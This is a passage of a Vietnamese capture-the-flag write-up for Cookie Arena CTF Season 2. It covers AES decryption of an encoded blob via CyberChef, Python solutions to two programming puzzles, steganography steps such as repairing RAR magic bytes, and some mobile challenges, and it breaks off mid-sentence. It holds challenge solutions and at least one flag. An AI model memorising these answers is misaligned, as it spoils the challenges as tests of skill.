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 ``` Dựa vào hàm `deCRyPT` ta biết 16 bytes đầu là IV và phần còn lại là plaintext ![](https://hackmd.io/_uploads/HJnfGrtFh.png) Tiếp tục dùng [Cyberchef](https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Hex','string':'77fdcac2333b9b670602d2c8ebb2a5843b9723f5d12924e43a59895c4e3647e3'%7D,%7B'option':'Hex','string':'6a2c7c471aea160f568b6ba2'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)&input=MTNhMDdjMDU1ODJiZTRiZTc1Yzc5ZTQyYzcxYzcwZTMzYTY5M2NlMzZhNWVjOTBhYTFlZjhkZWNlMzAzODM1Nzc0ZWE5NGUzOTZlMTZhNWU2ODg1Mzc1OTMyNWRmMWE0YzZiMGZkMWFlOTI4NzljMGMzZTZjZTk3MmM5YzI1MWM5ZDkzZmQ4YmJiMTdjMzY0MWYwYmMxYzJlYjc0YmFjZDNmYWRiYjA5NjliNTlhNTQ3ZTNiNTg3NGYwM2M0NzQ2OWUzZGFiYzVkYjI2ZDI4ZWRkOWVjZTI5YjY0NDUwZTFjOTE3ZjZlYzcwMzBiMmFhMTU2Y2EwY2RiZjY4NDk1MDNiMDUxZWUyOTZjOGU0MDcwYmVmNDg5MGU2MjgyMzljMjEzMjAyNGViMzIyNDVjNDA3ODk4ZGRiMGQ1ZWI0NjljYzQ3YTc2MWY2MzhlNTdkNDA4M2VkYzMzMWNmYmM1NzU5YTgzMDdlMDlmN2I3NGM3ZjgwYzNlNjUzMjI0MDQwNGQwMjg4NDhjNjY5ZTM2MDZkOWIwZmRiMDVjY2I4N2RiMDIzNTc0MjdhZjljNmJjYzYwZDJhOGFjZDc4YmUwOWIzMDY2MjRjYWY3YzBhMmY2OGFlYzNhZGRjZGRjMTFmYjAzMDc0MGY4ZWVlZWU4YzNjZjY5YjQ1YjYxYjc5YTVhNGJiZmU3ZjNkYmQ5ODQxNWJlODQ2ZWQyNjk3MzAzN2U5OTU5MjMzZWM1OTM4OGJiNmEzNjJiMzNiNThkOGU4MDJiY2E5MjMwY2IwZjZkNGE3YjY4YTJjZTE4NDMwZGMxNTYzOWNlMjBjZjkzZDA0OTdjNjUxMGI2OGZiMWI2NzVkMWY4OTUxMTUxNTY1MTczNGIwMGNkY2M0ZDQ4MDc5OTBiOTgwM2QwMDcwYWE1OTA5OTI3YjA1NzVmZTIyMWNhMTlmODVjMDkwNzYxZjY0ODk0YTc2NmQyY2I4NGRiMDE5MTI4MDY2MTU2OWUwMmJmZjYwYjMyOTE1ODQ2YmFkNzUxZmE2ZTVjMjVmOTJjMjFlYWRjZmQxNWNkZDQ4OTIwMmVkYjVkMmY1MmI3NTM1ODA0ZmJiNzZhZDUzYzExNTNiMjBlMGVkNzBiODNjNDE2OWM3NGZkNWE1NmM2MDAyODIzZDRjYTBhNzFjNjdjNzA4ZGQ3YWM4ODNiYTM2YjU5Y2Q1M2I2NWYwN2ZmODA4NWJjMzFlNWQxNzUwMDFlZTE4MGI0ZjkwMTA5MGI1OWU4NzA3ZWJjNzg2YzhjZjhkMDk1MDliNjFlZDJlMjgzNTJhNjgyZTJhZjc2NzNiNWRmMmRmY2JjODQzOGVlZWE2NDRhNmJmMWRlNjU4OWIxOTk5ZTBhZDg1MzFhMGUxMGMyNjRhMWUzMjRlYWI3ZGVhNDE4YTgwY2MxNmMyOTBkMzc2NjA2YzcyZTc3ZDdiZTEzNWQ4MTFiOTg5NTVmNzBiOWMwZjczNDk4YWQ2N2U3YjU2ZDMzZjExMWE2ZGM2ZTg0ZWVmZmI5NmFkMDJhZjE0MmZiOTRmOTk5ZTk3OWRjMmYxMmVlY2U4MjM1NjU3NmFkZDZkYmFiNDQxZDY0YTRkZDM1YzE2MjM5NjgyNDU4NjI4NGRjNzM2OGI1Y2Q0NmQxNzA2YmNlNmRmYzdiMWI1MjBkOGFkYTNlZGEyNTlhMTJiNDExYmFiMWFmM2VmMGE4OTcyNzhmMTYwMjA5ZGE1OWE5OTdiMzEzMTQyMjUwYjc1MzMwZTUxZTVmZTYxMWQzMjU4ZWMyNDk0NzFlZjhiZmU3NWMzYTA3MmIxM2I5NDczZmI4NWRlMzMxYjgyZjQzODc4NjIyMDFkYTlmZmFmNmI1MWU0MmQ1MDAwNDkzMWNmNjA4YTMyZDllNzUyZTFmMTMzMWUxYjRlZjg2ZTIyYjU0OGVkMjcwMGQyNWE0YmMxMjhjMzRjMTVmZmVhZmRiYjhmM2MzYWEzNDAyYzlmODk3M2E3ZTA2MzUyNTEyZDNkZWIwNDg4ODExNzAxZjlkYjRhMmE2ODdlODI3MmUzMjUyMTVlMjFhNjQ2YmUwNTFiMWU1Mzk1ZmExNzIzZDNlNTI0N2EzZGZlZDMyMDVmMGMxZDNkNGQwNTljZDVjNDdmOWUxYTQwNzEyY2M2ZDk2MmRkZmQxNTkyZWQ1YTk2MTczODQ0MWI4MjFjNTQ0ZjhiMmZiNmNhNjFjYzY5YzVmNDU2Y2MzMjVjNWVmMWRkNDA0ZGYwYTZlYzI0MDNhOWUwYjgwNmY4YWFlYjRhMTYwZTNiYTkwZTJmZjlmZDE4MDcyZTFmODYyNjhhMTUzYTQ2YjhiMjg3ZDNjMDQ3MjQxNDk4OWZlNWRlYWZkYmFhZTBhZGM3ZWJlNzU2M2E0NWU2ZDQwYThjNTQxOTA3ZGQ4Mjg4YWRjOTM3ODc3ZTY3ODgyYjk2OTc1NDI0OGQ3OGY0MjZiMGMxMDUyMmIwYTVkMDRlZTc3MjcxNDllYjhmNzI1NTBlYTdiYzMzNjFjNDJhOTYyZmVjZmZlY2RlNWE3NjZjMjZlZWI3NTdhMmRiZmI5NzkxOGYyN2QxYmIxNTA1Yjk4YzIyYzlkMGNjMTQ4MGFmZThhYzYxMDlhM2RkZmY0ODhlMjllYTk1NTE1NjVlY2JmMWMxOWE3ODYzOWNkNTY4NTY1NTE1MzhjMTY5NDM1NDJkNzFiYWI0NGM4ZTNhZDc4MmI4ZWMwZGVkMThmNjIxNjQ0ZTUwZjBlYWIyNWU1MWRlMjQyOTNiYmYxNmM4OTg3MDVmNTc3NjNkOWJhNGZmMjQyZDliYjgzOWE0OGQ5MTlkZDQxMzBhOGJiM2UzZGM2YmNiZmU0NzZhYjYwNTdkMjY4Y2Q5NWU2MjY2NmNjOThhYWIyMTIwZTFkY2FiODVlMjIwNmZlODgzNWE4MmUwYzQwOTBmYjAxYzdhZjZlNGJmNDI4ZDg5YWVmZTcyMjUyNjZjODFkMGVjOWM2YzAxZmY2NmFmNGI0OGM0ODhjZGQwZmE3YTc5NzExOWQ0MDE3ZWViZWQ2MjkwMGYxZGY0Mzg2ZTY2YThkZjE0MzFiMDNkM2Q4MjMwMzQyMjMzNzRlNjVmMDFiZjc3MTQ5MjUyYjQ4MTM5MDAzNTQxMTU4NTQxOWI0M2IyZTAzNDJmMDBlNDZmODRhNTQwNzdkYWVhZmJkOThmOGQwMDUyZGUwODA3NTg3N2M3MzNiMzNmYjlkNGEyOGQ0MmJkZDVkYmQ0MzU5MTc2NTcxOTc0NmEzNTQzZWY2YmM5MDNhMWZjMDJiNmRmMDc5YTBlNzllM2VkMThjNDQzNGQ2Mzk0YmI2ZmJkODdlYzljMzg5MzE0MWFmOGU3YjZiZTQxMjcwNjVlODQ2YzM1NjJkYTBhODU3NGVjMmYwYWE0MDNlZGMyY2ZlNjVlZWQ2ZTQ2ZDY0NDE5NmQwOGFhNmY5NWFjZjdhNDk3NzhmZjFiODE5MTUwOTkwYzEzMmFhMDVmY2Y1MDhiNzg5OGYwZTE5OGRkMzY4NmIwMzk4ZDVkNzk3ZThmYTg3N2M5NTgxNWFjZjFjNTkwMjM4MzhiZDVlNjY3ODQyZjcyYjc4NDk3ZDI0YTY0ZWQyZGNiOTdhNDIxZjBjNDMwMzVmYWYzOWMxOTViMWFhNzA0ZTdkYWYyMjVjYWUzYTVhYjcwMjBhOGE3MTdhZjU2ODU2ZmEwYzk2MjM5Yzg4M2ZhM2M4MWIyNTdkZTUxM2Y2ZjQ2NjU1NGY2MDUwNzFkMTY3YzhkMDBmZDI1OTFiMjYzNGNlYzgwOTMyNDI1ZWIxYTc5MGIyOTNjOWZjMTc1ZWQ1YTEyNmRkYzFlMDU1NjA3NjdhMGIxYTk5Y2NmMmQwZWIxZmRmYzkwNWVlNDY2MTNhZGVjMmYzNDU3MjU0OTY1YzU3ZWViZTgyOWYxNzc1OWVjZTM4NjQzNGMyNzk2ODRiNzdjMWMwMTQ5NzY3MjI2ZjQwMmQ3NmMyMDE2NmQ4MjhkY2NkY2IyY2JhM2Y2MWJkNTgwNDVhYzhjYmU0NTM2NTZkYWJjMTZjOTIxMzcxYzRkNjZlMDAyYWZkOTc5MTYzYWZjMmU2YTkwNDEwYmY4YjE5MjlmNTRlMWRjZjA0OWQ4NjMzOTgwODg5M2Y5OTM1Y2IyNWExODM4YTg0YzdjYzMyNDI1ZWU4OWMxMGMzZmMzYjhiNWJhNDM2ZGIxOWQzY2UzYzc5YjgxY2UxY2RmOTU1MzM2MmI3MmQxNjg0NzIxYTZlOWE2N2IwODdjYjI3NjQ0MGZhNjUwNTM5ZTRiMDczNzhkZDY0N2VmODJlYmQ5YWYzZDg3ZDJiYzY0Yzg5NDcxOGY1YmFjYTMxOWI4MmJiNTA0NjM1OGU3YzhjOTc2NDNkMTdiYzZkMWNmNWJlNDZjZjRjNDYyNThmNWFjNGZhMDQ4ZDkxZDA5NmMwMmQyY2MwMWQxNTJlMTJiNTU2MzUwNjMyZmZjODEzYTBlYTFmNzM5YWVkNzQ5ZDljMjdiODNhN2Y4OTc0NjM1NjY2ZTMxMDk3OTIzZDhjMWRiMGU4ODI5ODdmZWU2ZTQxMGI5NWJlZjY2ZmFjZmRjM2NmZTliZmE0ZWI5ODIyNTYyOTBhMzVhNzQ5OGQ1MTdjMmNiNGEyODc5MzBlMjk5YzE1YjkyMDZmNDdjMGUzYTQ0NzMwNmEwN2JjYTc2YjhkZTAxYTMxMGRjZTA3NjZiOTA1OTk2YjdlNjVlZThjZWVlNGEzZTM4MTVlNGJjMGM3ZDM3OTg1ODNhZTcyMDhkYWFiZTNmN2Q4ZjgxNjE1YWNjNDQ0ZWRmMzlmOTM3YzhlM2Y2NWNkZGYwMDQwZmMzNmQ4ODBiMzliMzE2YTRkMzcwNDA4NTc5ZjZlYjExNjVjMTZmZGYwNDNlZDBhNGMzZTU1MmU0ZWNkNDRhMWNiYTdlMmQxOTEzZDU3ZDJlZTMzYmMwZTYyYmYxYTVjN2NkNTJmZjgwNzJlYmFlNGU1NDFmNTU4ZjZjY2I0MjFhOWYwMmNiMTU0MTU5ZjNmOWU5NWNhODU3MDEwMDcwN2UxYTQ4ZjkyNGEwZTRlNTRlY2M3OGUxY2Q4YjUxYTNjNzJhZTZjMmY1NGU5ZmJhN2E0ODc3NTNlNTYxMzg0YmQ2Y2NkZDEyYTY4ODBjZmJlOWQ3YmE5YjY4ZThjZDJhNzBhZjk5MTU3Nzk5NDU4NmI0MTJkYzJhMzM4YjBiZjA5MDc2MGUzMmVlZTVkNjdiODI5MGRlYjkxMWY5NTg0NmQ0OWY1NjczZjc3YTBmMTA4YzM0ZTc3M2EwYTM4NGFmZTk0YzMyODM1MjhhZWMxNTBmN2RkNzg1ZjY5YzRlYjBjMjM3NWQ4MDBkN2FkNTQzOGY1YjhhZjAxZjg0MmNlODI0MDlmNWI4MDMwN2UwMjgzMjQ0NmMyM2U3NzM2NTNhZTU0MDYyZWZkNDI4MTdkYjQyMzc3YjE5YzU5MTAwMDRjZTYwZDRhMzU4YWM0ZDFjYzI2NTAzMzkzMjIwMWIyZWY4YTg2NTMxNjliYjg3M2Q3YzdlNzgyNDEzMTUxNDhiOGNkZDgyZTJlYjNiNmUzMDYyZjhiZjY3MTY2ZTNmM2Y5MzM3ZDUyYzM3NDZkZTYyOGI1MTkxZmE3MTQyYzU2YmVhNzhjMmI2OTQyZGI5OTgyY2JlMWQyM2JjYjY4ODA2YTA0MmUzOTdjZWE4MTNiYWE2ZmY3Njg5YmNhNzFkNDkwOWEzMjgwMTE4NjJjYzc1M2QzNGJhNzc4N2Y0NDQxN2QyY2U4OGQ3YjYyYjhlYTk4MWU4ZmU3M2VlNjUxNWEzMTE5ZjFlMzRiODllODk1NDNmMmFiOTYxOTMzNjJlYmQyMTQ1MjIzZTRhMTZjNWRiMmQ3MWViMzVkOTJjOTcwZGQ4MDhmNDdjMTZkZmJjNmE5OGY5NDYzZjY3MjgzNmE5YWEwNDQyNTVkOTM4MWI4NTYxZTI5NmM5NzM3OTczOTZkZTdiOTEzNDllZjFhOWJiMjMwMjU2MTliZjM0ZGQ0MjcxNGQwNzIwOTg1MDcxMTc5ZTFmZWU3MmQ1NzRjZDI2MDgzZjZkZDBiYzk0NGY5YmFkN2I3ZmZmOWFlMjViMjE3YmNjNGI4Y2Y3M2YwYTE5MjM4NjRhNTdmMjVhY2U2MGFiYTA1YjQ4YTYzY2NhMjViZThjOTI4ZjllYmI5ZTRhMTcxN2RlNGZjMDYxNDg4ZWI2ZTE5ZmRmZTNhYTMyOGQ1OWI2YjYzNTEzMzU2NzA5MmFhZWE5MzUzYjczYjAzYWU2Mjg5NWM1NjM3ZTVmMDJiNTFiZjdhODg5MjViZTIwMGFhOWY2MTJkZDYxMTc2NmFlM2VjOTg5NDgwOWY2NDQ1NWU5MGVmOGI0ZTRjYTExNjY2ZTcxN2EyYzdhN2E2NmEzN2EwODE0ZDNkZTQyMTk3Y2Y0MmIyMTFmMjY4NmIwNTJiY2M1ZDUwYjcxMmI0ZDg0NGMxMjE3MmYyODM1YTQ5ZjgxZWViODk4N2Q0YzRhMmFhOWQyOTAxMTFiYTM5NzkyY2JhYjQyMGYyMDcwMGYxM2VjNWRmOTgxOWM1MDY4NGQ2ZmVhMmZhMzNiMDYwODE5MmNhYWU4N2FhODY0MTgwZDJlNTc0MmM3MzhkZDcyOWQwNmE5YzVhMGZmNTc2NTM2YmFhNzgyOGQ1NDFiY2Q1ZWU0N2MwYWYzYzM4NjYyODM3OTk0ZTk3NGFiNmMxMTI0NGFiMjZiNWEzZGY4ZmM0MjU3YmJjZWVkZTQ3ZGI3NzY2ZjQ0NDI3NWRjZmI0Yzc1MDNlM2FmOWVkMTQ4ZjA0ZWRmM2VjYTg3Y2E0MTVjZjcyNDc5ODRjMmEzNDI0YjFiNWE4MmYxZTZkNjEzMDE5ZGZhNGI1OTNjMGVjYzA3M2QxZjRhZjgyMmNjMDk4YTczMWJkMjhiZWRkNWQxNTYxOTI3NWJjZGNlMmNmZmU2MGI0OWU3YzM3OWQ0NTkxZDc1YmQxNTZhOTI4MjgyMTcxODE3M2UxMTA4NmUxNmY0MTAzZTIyM2E4NTM0ZWFlYjg2M2NmOTBhNDEwNmIxYjM1ZGJhMjlmMzdhYzMxOGYwNGZiM2Q2NmRiZGE3ZDUwY2Q2Mzg2YzBlNGQzMDJiYjJiNGU1MDFlMjMyYjlkMTA4MWZhNGY4Yzg5NTU3Y2M2YTM0ZTE4YTE0NjE3Njg2YmE3NDk5NmFiOTU5NGRhYjhhNWMxNTdkZGU0ZWE1ZmU1MDU0MjU3NjU5YjAzZjJjNTU4MDgxN2NiOTcxODk0NjBkOTQzMmVjMTg1NTgwZWFkMjczODI1MGY4OWIwODlmMDdlZTljMWI4NTI1NGMxN2NlY2JkNzBhNDg4MGZkYmY3ODE0ODVkNGMyMzI3ZWVlYjZkNjEyMjg1Y2MyZTI2YzM1MWFjNGJiYTlhYmUxNTdhMDg4NjZiM2VlNGVjM2M5MzJjNWQ4YmMxMGU2NDBlNzkwMzYwNzlhNzZmOThmNjQ2NzA2ODhhNGZiMmUzZTRkZTFlZmMyN2U0MmYwZTYwZjA2ZGVkOTRlMDgzMTI1ZDViZjZlNzY0ZWFiYTY2ZjI5YjBlMjk5OGQzNzFjZDc0MTEwODQ0MzgwNjU3MDZjMGUzZDhhYjEzYzE5MzE3NjBkZTRmODU1YjVjY2YwMDU0OGQyYjJlNTdkZmMzMDJiMzMwMTlmZTJkNWQ3MTc2MzA0YTE4ZTNlMTVhZDkyY2MzM2VjZTJiNThjMDIwMmJlNzFjNGY0NDRhYzZkZGQxZGRlMjhjY2RmMjMyYmFiNjQzODY1ZWQ2ZmM0M2RiMjY3MTAxYWQzMGJjYTA5NzVmN2MxMWY1ZWRiNTBiYTI3OWExMGVjMjc3MmI5YTg0NTViZjc0MTVlYmVjMjhlMmE2N2Y4ZDRjN2IyOGI1ZGE5MjYxYTE4NjdhZjhhN2EyYjg3NGJjMTNlZDA0NGU4OTJiNmU1NTRjYWVjNGRhZmIwNjJiMDQ4NTMyOTRlNGZhNjI0YWYwYjBhMDQ5NzZmYWY2MmZmOTc3ZDcwYmM5MDAyYmJmOTQ2NjEyN2I4ZDZkYzQ3OGQwMjUxYWFkZWZjMjhmOGYxMzQwYzU1MDU2OGRmZjI4ODJiMWE2MTA2YTdjMzliM2E0MzZmOWJhMGRhNjFlZjI2Y2EwNTRkNjMyYTNmOWNhYTcwYTFlMWM5NmU5YmE2NDg5OTcyYTZiYTAyYjNjZDAyMzkwNzlmNzk5MjQ4MWM4YjYxYTZhOGFmMWNiNjc1M2JjNGViOTUzZjgxODdkZDU0MjRiNzgxZWRiNWI3ODRmOTBmNTAwY2NlNTA2ODhmMDAzYTJkOTY1MjVmYmU1Yjc2ZGViZWEzZGZlMzA0OGY5ZTRlMjQwMWNmZmY3MTI3NjkxYzhmYmRkMTRmY2RjZWM4YjA5NGM0M2M1NDBhMGY4YzlmOWJkOTUxZDYzYjlkN2ZkNTRhOTc1MTM5ZWM1YWEwYWQzMzRmMWRiNDc5ZjE5YjA3NWZhNzc5ODcyYzRkNDMwZDY5M2UxNzFiYmZlYmU4NGQ0MDViZjg4NGNlNjJhZjgyMDJlNDljMzY3NjE4ZDhkMWVlNDk2N2NiMzU3NWRkYmNiM2UwZjMyOGQ5M2MwMWEzMmFmYTFkMGUzNTY5MzMyYmE2MDVkNjY1YmM2ZDczNTIxZGEzZjYwMjBmNDQ5Y2ZlNzQyOGYzZDljZWQ3ZGNjMjM1MjJjYmI3NTg0NzZhMTdhODgzYzk4OTJmNGRjMzNhMjI4YzlmZTU5NTMxNGYzNGUxZmJmZWY1MzlhNDFhNWM4M2IyM2VhZWE5MmJmZGFjODI1YjZiMjJkZTY3Nzg3YWNkOGNhZjZkNjlkMzNmMjJiNmNhYzMxMmJhZGFjMjM1ZmI3MWJkZjRhZDFlYzExMDQ2M2VmNWY1MzNmZWVjNTJiZGE3ZWUxNDZkMDIxMTQ2NzE3NTc5NjNiMGYzNzNmNzhmYzAzNmVlMmEwMjIwMmFjNTk3OTFjMGNhZmUzMTliMzI1ZmY3NTg2Njg0NDQ5N2JlMmM5Mzg5OGU4MzQ4YTUyZTE5OTM3YzUxNGRlOWRkMmQ3YjU3YWM) để decrypt ![](https://hackmd.io/_uploads/Hk04SHtF2.png) Ta tìm thấy đoạn hex, khi decode ta được kết quả là một file ảnh ![](https://hackmd.io/_uploads/SJKcHBYYh.png) Khi tải về là một mã QR, khi quét thì được flag Flag: CHH{D0n't_w0rRy_n0_st@r_wh3rE} # Program ## Identity Security Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/identity-security ```python def mask_phone_number(phone_number): return phone_number[:2] + '*'*(len(phone_number)-5) + phone_number[-3:] def mask_email(email): username, domain = email.split('@') if len(username) <= 7: masked_username = username[0] + '*'*(len(username)-2) + username[-1:] else: masked_username = username[:2] + '*'*(len(username)-5) + username[-3:] masked_email = masked_username + '@' + domain return masked_email n = int(input()) masked_info = [] for i in range(n): info = input().replace('\r','') if '@' in info: masked_info.append(mask_email(info)) else: masked_info.append(mask_phone_number(info)) for info in masked_info: print(info) ``` ## Decrypt Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/decrypt ```python def reverse_string(string, start, end): new_string = string[:start] + string[start:end+1][::-1] + string[end+1:] return new_string def find_divisors(n): divisors = [] for i in range(1, n + 1): if n % i == 0: divisors.append(i) return divisors n = int(input()) password = input() divisors = find_divisors(n) for d in divisors: password = reverse_string(password, 0, d - 1) print(password) ``` # Stenography Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/cutiek1tty Dùng https://www.aperisolve.com/ , biết được pass và biết đây là file rar ![](https://hackmd.io/_uploads/S1-onlYY2.png) ![](https://hackmd.io/_uploads/B1H2nlKt3.png) Sau khi giải nén được ![](https://hackmd.io/_uploads/H1U6nlFY3.png) Magic bytes của `y0u_4r3_cl0s3.rar` bị sai ![](https://hackmd.io/_uploads/SJjJTltFh.png) Sửa lại đúng định dạng file rar và extract bằng password ở trên ![](https://hackmd.io/_uploads/SkS_6xKK2.png) ![](https://hackmd.io/_uploads/B1KFaltYh.png) # Mobile ## CatMe Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/cat-me ![](https://hackmd.io/_uploads/ry399etth.png) ![](https://hackmd.io/_uploads/ByJgjxtY3.png) ## PinnedCookie Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/pinned-cookie Từ đây biết được mã base64 và key ![](https://hackmd.io/_uploads/rk1Nigtt2.png) Viết script dựa trên `y0` 